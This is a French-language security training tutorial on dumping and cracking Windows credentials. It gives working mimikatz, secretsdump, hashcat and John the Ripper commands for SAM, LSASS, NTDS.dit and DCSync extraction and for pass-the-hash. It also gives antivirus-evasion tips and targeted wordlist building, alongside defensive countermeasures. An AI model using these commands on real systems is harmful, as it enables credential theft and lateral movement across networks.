Récupération de mots de passe système Windows
Extraction et cassage des identifiants d'authentification Windows
Ce que vous allez découvrir
🎯 Pourquoi c'est important
Le cassage de mots de passe Windows représente une compétence fondamentale en test d'intrusion et réponse aux incidents. Les systèmes Windows dominent les environnements d'entreprise, avec l'authentification Active Directory contrôlant l'accès aux ressources critiques à travers des réseaux entiers. Comprendre comment extraire et casser les identifiants Windows permet aux professionnels de la sécurité d'évaluer les politiques de mots de passe, démontrer la faisabilité des attaques et identifier les comptes vulnérables avant que des acteurs malveillants ne les exploitent. Lors des tests d'intrusion, l'obtention d'identifiants administrateur local ou de domaine fournit souvent le point pivot pour le mouvement latéral, l'escalade de privilèges et la compromission complète du réseau. Maîtriser les techniques de cassage de mots de passe Windows est essentiel pour évaluer la véritable posture de sécurité des infrastructures basées sur Windows.
🔍 Ce que vous allez apprendre
Vous maîtriserez les outils d'extraction d'identifiants Windows incluant mimikatz, secretsdump.py et pwdump, comprendrez les formats de hachage NTLM et NTLMv2 et leurs vulnérabilités, apprendrez les techniques d'extraction de la base SAM depuis des systèmes hors ligne et en direct, et développerez des compétences en cassage de mots de passe, attaques pass-the-hash et audit de mots de passe Active Directory. Ces techniques sont critiques pour les tests d'intrusion des environnements Windows, l'évaluation des politiques de mots de passe organisationnelles, l'identification des modèles de réutilisation d'identifiants et la compréhension de comment les attaquants pivotent à travers les réseaux Windows en utilisant du matériel d'authentification volé.
🚀 Votre première victoire
Dans les 20 prochaines minutes, vous comprendrez comment Windows stocke les mots de passe, apprendrez à extraire les hachages NTLM de la base SAM et saurez exactement comment les professionnels de la sécurité cassent les identifiants Windows lors des évaluations de sécurité.
🔧 Essayez maintenant
Examinons comment fonctionnent les hachages de mots de passe Windows avec une démonstration (nécessite Windows ou Kali Linux avec Impacket) :
# Exemple de génération de hachage NTLM
# Les hachages NTLM Windows sont des hachages MD4 du mot de passe en UTF-16LE
# Installer passlib pour la génération de hachages NTLM :
# Ubuntu/Debian :
sudo apt install python3-passlib
# OU via pip :
pip3 install passlib
# Générer un hachage NTLM :
python3 -c "from passlib.hash import nthash; print(nthash.hash('password'))"
# Sortie : 8846f7eaee8fb117ad06bdd830b7586c
# Le même mot de passe produit toujours le même hachage (pas de sel !)
# C'est pourquoi NTLM est vulnérable aux tables arc-en-ciel
# Pour les tests d'intrusion, vous extrairez les hachages depuis :
# 1. Base SAM (comptes locaux)
# 2. NTDS.dit (Active Directory)
# 3. Dumps mémoire (mimikatz)
# 4. Captures réseau (challenge/response NTLMv2)
# Exemple : Afficher les hachages SAM locaux (nécessite admin)
# Windows :
# reg save HKLM\SAM sam.save
# reg save HKLM\SYSTEM system.save
# Linux (monter partition Windows) :
# sudo mount /dev/sda1 /mnt
# ls /mnt/Windows/System32/config/SAM
# Extraire les hachages avec secretsdump.py (Impacket) :
# secretsdump.py -sam sam.save -system system.save LOCAL
# Vous verrez le format :
# username:RID:LM_hash:NTLM_hash:::
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::Vous verrez : Les hachages NTLM sont des chaînes hexadécimales de 32 caractères représentant des hachages MD4 de mots de passe. L'absence de sel signifie que des mots de passe identiques produisent des hachages identiques, permettant les attaques par tables arc-en-ciel et rendant les mots de passe faibles instantanément reconnaissables. Comprendre ce format de hachage est fondamental pour les attaques d'identifiants Windows.
Compétences que vous maîtriserez
✅ Compréhension fondamentale
- Mécanismes d'authentification Windows et protocole NTLM
- Structure de la base SAM et stockage des identifiants
- Différences de format de hachage NTLM vs NTLMv2
- Techniques d'extraction d'identifiants locaux vs domaine
🔍 Compétences expertes
- Techniques avancées d'extraction d'identifiants mimikatz
- Audit de mots de passe Active Directory NTDS.dit
- Attaques pass-the-hash et pass-the-ticket
- Extraction et manipulation de tickets Kerberos
Comprendre l'authentification Windows
L'authentification Windows a évolué à travers plusieurs générations, avec NTLM (NT LAN Manager) représentant le protocole hérité encore largement utilisé aujourd'hui. Lorsqu'un utilisateur se connecte à Windows, son mot de passe est haché en utilisant MD4 (pour NTLM) et stocké dans la base Security Account Manager (SAM) pour les comptes locaux, ou dans la base NTDS.dit d'Active Directory pour les comptes de domaine. La vulnérabilité critique est que les hachages NTLM n'utilisent pas de sel - des mots de passe identiques produisent des hachages identiques sur tous les systèmes Windows. Ce défaut de conception, maintenu pour la rétrocompatibilité, permet les attaques par tables arc-en-ciel et rend les mots de passe faibles instantanément reconnaissables par les attaquants qui obtiennent des bases de hachages.
🔐 Stockage des mots de passe Windows
Mot de passe utilisateur → Encodage UTF-16LE → Hachage MD4 → Hachage NTLM
Stocké dans : SAM (local) ou NTDS.dit (domaine)
Pas de sel, pas d'itérations - mots de passe identiques = hachages identiques
La faiblesse
NTLM utilise le hachage MD4 sans sel ni fonction de dérivation de clé, le rendant extrêmement rapide à casser. Les tables arc-en-ciel contiennent des hachages précalculés pour des milliards de mots de passe.
L'attaque
Extraire les hachages NTLM de la base SAM, de la mémoire ou des captures réseau, puis casser avec hashcat/John the Ripper ou utiliser pass-the-hash pour s'authentifier directement.
Le résultat
Compromission système, mouvement latéral à travers les réseaux, escalade de privilèges vers administrateur de domaine et accès persistant à l'infrastructure Windows.
La documentation d'authentification NTLM de Microsoft décrit les mécaniques du protocole, mais les implications de sécurité sont sévères. Les hachages NTLM peuvent être cassés à des vitesses dépassant 100 milliards de tentatives par seconde sur des GPU haut de gamme. Les mots de passe simples comme "Password1" se cassent instantanément, tandis que même les mots de passe complexes de 8 caractères peuvent tomber en quelques heures. L'absence de fonctions de dérivation de clé comme PBKDF2 signifie qu'il n'y a pas de coût computationnel pour tester les mots de passe, contrairement aux schémas modernes de hachage de mots de passe.
Les attaques pass-the-hash représentent une vulnérabilité encore plus critique dans l'authentification Windows. Puisque les systèmes Windows s'authentifient en utilisant directement les hachages NTLM (pas le mot de passe en clair), les attaquants qui obtiennent des hachages peuvent s'authentifier aux systèmes sans jamais casser le mot de passe. Des outils comme mimikatz, psexec.py d'Impacket et CrackMapExec permettent le mouvement latéral à travers les réseaux Windows en utilisant des hachages NTLM volés. Cela compromet fondamentalement la sécurité basée sur les mots de passe - même les mots de passe forts et aléatoires ne fournissent aucune protection contre les attaques pass-the-hash une fois le hachage compromis. Les organisations doivent implémenter des contrôles additionnels comme Credential Guard, le mode admin restreint et une segmentation réseau appropriée pour atténuer ce vecteur d'attaque.
Outils et techniques
🔨 mimikatz : maître de l'extraction d'identifiants
Mimikatz, créé par Benjamin Delpy, représente le standard de l'industrie pour l'extraction d'identifiants Windows. Cet outil extrait les mots de passe en clair, les hachages NTLM, les tickets Kerberos et autre matériel d'authentification de la mémoire Windows. Bien que principalement connu pour le vol d'identifiants post-exploitation, mimikatz permet également les attaques pass-the-hash, pass-the-ticket et golden ticket.
# Télécharger mimikatz depuis : https://github.com/gentilkiwi/mimikatz
# Nécessite des privilèges administrateur
# Dump d'identifiants basique
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
# La sortie affiche :
# - Noms d'utilisateur
# - Domaines
# - Hachages NTLM
# - Parfois mots de passe en clair (si WDigest activé)
# Extraire tous les identifiants de la mémoire LSASS
sekurlsa::logonpasswords full
# Dumper les hachages de la base SAM
lsadump::sam
# Attaque pass-the-hash (s'authentifier avec le hachage)
sekurlsa::pth /user:Administrator /domain:HACKERDNA /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe
# Extraction de tickets Kerberos
sekurlsa::tickets /export
# Attaque DCSync (extraire les hachages du contrôleur de domaine)
lsadump::dcsync /domain:hackerdna.local /user:Administrator
# Note : Windows Defender moderne détecte mimikatz
# Utilisez des versions obfusquées ou exécutez depuis la mémoire
# Alternatives : pypykatz, SharpKatz, SafetyKatzLa puissance de mimikatz vient de sa capacité à interagir avec les sous-systèmes d'authentification Windows à bas niveau. Le module sekurlsa extrait les identifiants de la mémoire LSASS (Local Security Authority Subsystem Service), où Windows met en cache le matériel d'authentification. Le dépôt officiel mimikatz fournit une documentation complète, bien que les professionnels de la sécurité doivent noter que mimikatz est fortement signé par les antivirus. Les pentests en production nécessitent des techniques d'évasion ou des outils alternatifs.
⚡ Impacket secretsdump : extraction de hachages hors ligne
Le secretsdump.py d'Impacket fournit une extraction d'identifiants hors ligne puissante depuis les fichiers SAM, SYSTEM et NTDS.dit. Cet outil Python fonctionne sur toutes les plateformes et ne nécessite pas Windows, le rendant idéal pour l'analyse forensique et l'audit de mots de passe hors ligne.
# Installer Impacket
pip3 install impacket
# Extraire les hachages SAM locaux (hors ligne)
# D'abord, obtenir les ruches de registre SAM et SYSTEM
# Sur le système Windows cible (en tant qu'admin) :
# reg save HKLM\SAM sam.save
# reg save HKLM\SYSTEM system.save
# Extraire les hachages avec secretsdump
secretsdump.py -sam sam.save -system system.save LOCAL
# Format de sortie :
# username:RID:LM_hash:NTLM_hash:::
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
# Extraction distante (nécessite des identifiants)
secretsdump.py 'DOMAIN/user:password@<target>'
# Utiliser le hachage NTLM pour l'authentification (pass-the-hash)
secretsdump.py -hashes :8846f7eaee8fb117ad06bdd830b7586c 'DOMAIN/Administrator@<target>'
# Extraire les hachages Active Directory depuis NTDS.dit
# D'abord, obtenir NTDS.dit et SYSTEM du contrôleur de domaine
secretsdump.py -ntds ntds.dit -system system.save LOCAL
# Attaque DCSync (extraire les hachages DC à distance)
secretsdump.py 'DOMAIN/Administrator:password@<target>' -just-dc
# Extraire un utilisateur spécifique
secretsdump.py 'DOMAIN/Administrator:password@<target>' -just-dc-user krbtgtSecretsdump excelle dans l'analyse hors ligne, le rendant précieux pour les investigations forensiques et les audits de mots de passe où vous avez des images disque ou des dumps de registre. L'outil supporte également l'extraction distante via SMB, permettant la récolte d'identifiants depuis des systèmes en direct lors de tests d'intrusion autorisés. Pour les environnements Active Directory, l'extraction de NTDS.dit fournit les hachages de chaque compte de domaine, permettant une évaluation complète de la politique de mots de passe.
🚀 hashcat : cassage NTLM accéléré par GPU
Hashcat fournit des performances extrêmes pour le cassage de hachages NTLM grâce à l'accélération GPU. L'absence de dérivation de clé de NTLM en fait l'un des types de hachage les plus rapides à casser - les GPU modernes atteignent plus de 100 milliards de tentatives NTLM par seconde.
# Mode hashcat pour NTLM : 1000
# Format : hash ou username:hash
# Attaque par dictionnaire
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt
# Attaque basée sur des règles pour mutations de mots de passe
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt -r rules/best64.rule
# Attaque par masque pour modèles connus
# Exemple : 8 caractères, commence par majuscule, finit par 2 chiffres
hashcat -m 1000 -a 3 ntlm_hashes.txt '?u?l?l?l?l?l?d?d'
# Attaque hybride : liste de mots + masque
hashcat -m 1000 -a 6 ntlm_hashes.txt rockyou.txt '?d?d?d?d'
# Attaque par combinaison
hashcat -m 1000 -a 1 ntlm_hashes.txt wordlist1.txt wordlist2.txt
# Afficher les mots de passe cassés
hashcat -m 1000 ntlm_hashes.txt --show
# Benchmark vitesse de cassage NTLM
hashcat -m 1000 -b
# Vitesses typiques :
# RTX 3090 : 100+ GH/s (100 milliards de hachages/seconde)
# RTX 4090 : 200+ GH/s
# Même les GPU faibles atteignent des milliards de tentatives/seconde
# Pour NTLMv2 (challenge/response depuis capture réseau)
# Mode 5600 : NetNTLMv2
hashcat -m 5600 -a 0 ntlmv2_hashes.txt rockyou.txtLa vitesse extrême du cassage NTLM signifie que la longueur du mot de passe devient critique. Un mot de passe de 8 caractères utilisant tous les types de caractères peut être recherché exhaustivement en semaines sur du matériel grand public. Les organisations devraient exiger des mots de passe de 14+ caractères minimum, bien que même cela fournisse une protection limitée contre les attaques ciblées avec des listes de mots personnalisées. Le cassage NTLMv2 est significativement plus lent en raison du calcul challenge/response, mais reste vulnérable aux attaques par dictionnaire.
🎯 John the Ripper : cassage de mots de passe polyvalent
John the Ripper fournit un excellent cassage NTLM avec détection automatique de format et gestion intégrée des listes de mots. Bien que plus lent que l'accélération GPU de hashcat, John excelle en mode incrémental et attaques personnalisées basées sur des règles.
# Détection de format et cassage
john ntlm_hashes.txt
# Spécifier le format explicitement
john --format=NT ntlm_hashes.txt
# Attaque par dictionnaire
john --wordlist=rockyou.txt ntlm_hashes.txt
# Mutations basées sur des règles
john --rules --wordlist=rockyou.txt ntlm_hashes.txt
# Mode incrémental (force brute)
john --incremental ntlm_hashes.txt
# Afficher les mots de passe cassés
john --show ntlm_hashes.txt
# Règles personnalisées pour mots de passe Windows d'entreprise
echo '[List.Rules:WindowsRules]' > windows.conf
echo 'cAz"[0-9][0-9][0-9][0-9]"' >> windows.conf # Nom d'entreprise + 4 chiffres
echo 'cAz"[!@#$]"' >> windows.conf # Majuscule + caractère spécial
echo 'Az"[0-9][0-9]""[!@#]"' >> windows.conf # Mot + chiffres + spécial
john --rules=WindowsRules --wordlist=company.txt ntlm_hashes.txt
# Gestion de session
john --session=hdna_windows ntlm_hashes.txt
john --restore=hdna_windowsLa force de John the Ripper réside dans son moteur de règles et son mode incrémental. Les mots de passe Windows d'entreprise suivent souvent des modèles prévisibles (Saison+Année+Spécial, NomEntreprise+Trimestre, etc.), rendant les règles personnalisées très efficaces. Le mode incrémental teste systématiquement les mots de passe par analyse de fréquence, cassant souvent les mots de passe simples plus rapidement que les attaques par dictionnaire.
Contre-mesures défensives
🛡️ Politiques de mots de passe fortes
Étant donné le hachage faible de NTLM, les environnements Windows nécessitent des politiques de mots de passe strictes qui tiennent compte de la vitesse extrême du cassage hors ligne. Les recommandations de politique de mot de passe de Microsoft fournissent des conseils de base, mais les organisations devraient dépasser ces minimums pour les comptes privilégiés.
- Minimum 14 caractères : Les mots de passe plus longs augmentent exponentiellement le temps de cassage
- Phrases de passe plutôt que complexité : "correct horse battery staple" bat "P@ssw0rd!"
- Exigences pour comptes privilégiés : 20+ caractères pour les admins de domaine et comptes de service
- Rotation des mots de passe : Changements réguliers pour les comptes privilégiés (minimum trimestriel)
🔐 Technologies de protection des identifiants
Les versions modernes de Windows incluent des fonctionnalités de protection des identifiants qui atténuent le vol d'identifiants et les attaques pass-the-hash. Les organisations devraient activer ces protections sur tous les systèmes Windows, particulièrement sur les cibles de haute valeur comme les serveurs et les postes de travail administrateurs.
- Credential Guard : Utilise la sécurité basée sur la virtualisation pour protéger les hachages NTLM et tickets Kerberos
- Remote Credential Guard : Protège les identifiants lors des sessions Bureau à distance
- Mode Admin restreint : RDP sans envoyer les identifiants au système distant
- Protection LSA : Empêche l'injection de code dans le processus LSASS
⚡ Durcissement de la sécurité Active Directory
La sécurité Active Directory s'étend au-delà des politiques de mots de passe pour inclure la gestion des privilèges, la journalisation d'audit et la réduction de la surface d'attaque. Le modèle d'administration par niveaux sépare les comptes à hauts privilèges des opérations quotidiennes, limitant l'exposition des identifiants.
- Administration par niveaux : Comptes admin séparés pour Tier 0 (Contrôleurs de domaine), Tier 1 (serveurs), Tier 2 (postes de travail)
- Postes de travail à accès privilégié (PAW) : Systèmes dédiés et durcis pour les tâches administratives
- Administration juste-à-temps (JIT) : Élévation de privilèges temporaire au lieu de droits admin persistants
- Désactiver l'authentification NTLM : Transition vers Kerberos uniquement lorsque possible
🔍 Surveillance et détection
Détecter le vol d'identifiants et les attaques pass-the-hash nécessite une journalisation complète, une analyse comportementale et une surveillance de sécurité. Les organisations devraient implémenter des mécanismes de détection pour les modèles d'attaque courants associés à la compromission d'identifiants Windows.
- Politiques d'audit améliorées : Journaliser tous les événements d'authentification, utilisation de privilèges et accès aux objets sensibles
- Détection de dump d'identifiants : Surveiller les signatures mimikatz et l'accès LSASS
- Détection de mouvement latéral : Alerter sur les modèles d'authentification et utilisation de services inhabituels
- Détection de password spray : Identifier les tentatives d'authentification distribuées sur plusieurs comptes
FAQ
Bases du cassage de mots de passe Windows
Comment extraire les hachages NTLM d'un système Windows ?
Extrayez les hachages NTLM en utilisant mimikatz (depuis la mémoire avec "sekurlsa::logonpasswords" ou "lsadump::sam"), secretsdump.py (depuis les ruches de registre SAM/SYSTEM hors ligne), ou en exportant les clés de registre avec "reg save HKLM\SAM sam.save" et "reg save HKLM\SYSTEM system.save". Pour Active Directory, extrayez NTDS.dit des contrôleurs de domaine en utilisant ntdsutil, les copies shadow de volume ou les attaques DCSync via mimikatz/secretsdump. Toutes les méthodes nécessitent des privilèges administrateur. Les hachages apparaissent au format username:RID:LM_hash:NTLM_hash où le hachage NTLM est la chaîne hexadécimale de 32 caractères que vous casserez.
Quelle est la différence entre NTLM et NTLMv2 ?
NTLM est le hachage de mot de passe stocké dans SAM/NTDS.dit (hachage MD4 du mot de passe), tandis que NTLMv2 est un protocole d'authentification challenge-response utilisé sur le réseau. Les hachages NTLM peuvent être cassés hors ligne à des vitesses extrêmes (100+ milliards/sec sur GPU) ou utilisés directement dans les attaques pass-the-hash. Les captures NTLMv2 du trafic réseau incluent le challenge et la réponse, nécessitant le cassage pour récupérer le mot de passe - beaucoup plus lent mais toujours vulnérable aux attaques par dictionnaire. Utilisez le mode hashcat 1000 pour les hachages NTLM et le mode 5600 pour les captures réseau NTLMv2.
Pourquoi les hachages NTLM sont-ils si rapides à casser comparés aux autres types de hachage ?
NTLM utilise un seul hachage MD4 sans sel et sans fonction de dérivation de clé, le rendant computationnellement trivial de tester des mots de passe. Les hachages modernes comme bcrypt ou PBKDF2 utilisent des milliers ou millions d'itérations pour ralentir le cassage, mais NTLM n'effectue qu'une seule opération MD4. Cela signifie que les GPU peuvent tester plus de 100 milliards de mots de passe NTLM par seconde, tandis que le même matériel pourrait ne tester que 100 000 hachages bcrypt par seconde - un million de fois plus lent. Microsoft maintient ce hachage faible pour la rétrocompatibilité avec les systèmes hérités, créant une vulnérabilité fondamentale dans l'authentification Windows.
Implémentation technique
Qu'est-ce que les attaques pass-the-hash et comment fonctionnent-elles ?
Les attaques pass-the-hash s'authentifient aux systèmes Windows en utilisant directement les hachages NTLM sans casser le mot de passe. Windows accepte les hachages NTLM pour l'authentification, donc les attaquants qui volent des hachages via mimikatz ou secretsdump peuvent utiliser des outils comme psexec.py d'Impacket, CrackMapExec ou "sekurlsa::pth" de mimikatz pour s'authentifier en tant que cet utilisateur. Cela fonctionne parce que l'authentification NTLM envoie le hachage (ou une valeur dérivée du hachage), pas le mot de passe. Même les mots de passe aléatoires forts ne fournissent aucune protection une fois le hachage volé. Les défenses incluent Credential Guard, désactiver NTLM et la segmentation réseau pour limiter le mouvement latéral.
Combien de temps faut-il pour casser différents types de mots de passe Windows ?
Les mots de passe simples (mots du dictionnaire, modèles courants) se cassent instantanément - apparaissant souvent dans les tables arc-en-ciel. Les mots de passe de 8 caractères avec caractères mixtes prennent des heures à des jours selon la complexité. Les mots de passe de 10 caractères peuvent prendre des semaines à des mois pour une force brute complète. Les mots de passe de 14+ caractères avec haute entropie deviennent impraticables à casser avec le matériel actuel - des années à des décennies même avec des clusters GPU puissants. Cependant, les attaques par dictionnaire ciblées utilisant des listes de mots spécifiques à l'entreprise cassent les mots de passe beaucoup plus rapidement que la force brute. La vitesse GPU compte énormément - une RTX 4090 casse NTLM 10x plus vite qu'une RTX 2080, réduisant les jours à des heures.
Applications pratiques
Comment casser les mots de passe Active Directory pour l'audit de sécurité ?
Pour les audits de mots de passe Active Directory, extrayez NTDS.dit en utilisant DCSync (mimikatz/secretsdump avec identifiants Domain Admin), sauvegarde NTDS.dit du contrôleur de domaine, ou copie shadow de volume. Utilisez "secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL" pour dumper tous les hachages de domaine. Alimentez-les à hashcat avec le mode 1000 et des listes de mots complètes. Analysez les résultats pour identifier les mots de passe faibles, la réutilisation de mots de passe et les violations de politique. Concentrez-vous sur les comptes privilégiés (Domain Admins, Enterprise Admins, comptes de service). Utilisez des outils comme DSInternals ou NtdsAudit pour une analyse de mots de passe supplémentaire comme trouver les mots de passe dupliqués entre comptes.
Quels modèles de mots de passe fonctionnent le mieux pour le cassage Windows d'entreprise ?
Les mots de passe Windows d'entreprise suivent souvent des modèles prévisibles : Saison+Année (Winter2024, Spring2024), NomEntreprise+Chiffres (Acme2024, Acme123), Prénom+InitialeNom+Année (JohnS2024), et exigences de complexité (Password1!, Welcome1!). Créez des listes de mots personnalisées à partir de variations du nom d'entreprise, noms d'employés depuis LinkedIn, noms de produits et emplacements de bureaux. Utilisez les règles hashcat pour appliquer des mutations courantes - majuscule première lettre, ajouter années, ajouter caractères spéciaux. Les attaques par combinaison joignant des termes d'entreprise avec des mots de passe courants sont très efficaces. Le password spraying avec ces modèles réussit souvent avant de nécessiter un cassage exhaustif.
Pourquoi mimikatz est-il détecté par les antivirus et comment éviter la détection ?
Mimikatz est fortement signé par les antivirus car c'est l'outil de dump d'identifiants le plus courant. Évitez la détection en utilisant des versions obfusquées (script PowerShell Invoke-Mimikatz), des alternatives compilées (pypykatz en Python, SharpKatz en C#), ou exécutez directement depuis la mémoire sans toucher le disque. Utilisez SafetyKatz qui charge mimikatz dynamiquement, ou écrivez des dumpers LSASS personnalisés. Pour les pentests en production, dumpez la mémoire du processus LSASS avec des outils légitimes (Gestionnaire de tâches, procdump) puis extrayez les identifiants hors ligne avec pypykatz ou mimikatz. Considérez des techniques alternatives comme DCSync qui ne touche pas LSASS ou secretsdump.py pour l'extraction de hachages hors ligne.
Credential Guard peut-il complètement empêcher le vol d'identifiants ?
Credential Guard réduit significativement le risque de vol d'identifiants en stockant les hachages NTLM et tickets Kerberos dans un conteneur virtualisé protégé par la virtualisation matérielle. Cela empêche mimikatz et outils similaires d'accéder aux identifiants dans la mémoire LSASS. Cependant, Credential Guard ne protège pas contre toutes les attaques - il n'empêche pas les keyloggers, les attaques par accès physique, les attaques de firmware ou le vol d'identifiants depuis la mémoire non protégée. Il nécessite également du matériel compatible (UEFI, TPM 2.0, support de virtualisation) et n'est pas disponible sur toutes les versions Windows. Les organisations devraient voir Credential Guard comme une couche de défense en profondeur, pas une solution complète.
🎯 Vous maîtrisez le cassage de mots de passe Windows !
Vous comprenez maintenant les mécanismes d'authentification Windows, pouvez extraire les hachages NTLM des bases SAM et de la mémoire, et savez comment casser les identifiants Windows en utilisant hashcat et John the Ripper. Ces compétences sont essentielles pour les tests d'intrusion des environnements Windows, l'évaluation des politiques de mots de passe organisationnelles et la compréhension de comment les attaquants pivotent à travers les réseaux Windows en utilisant du matériel d'authentification volé.
Prêt à explorer les techniques d'optimisation avancée du cassage de mots de passe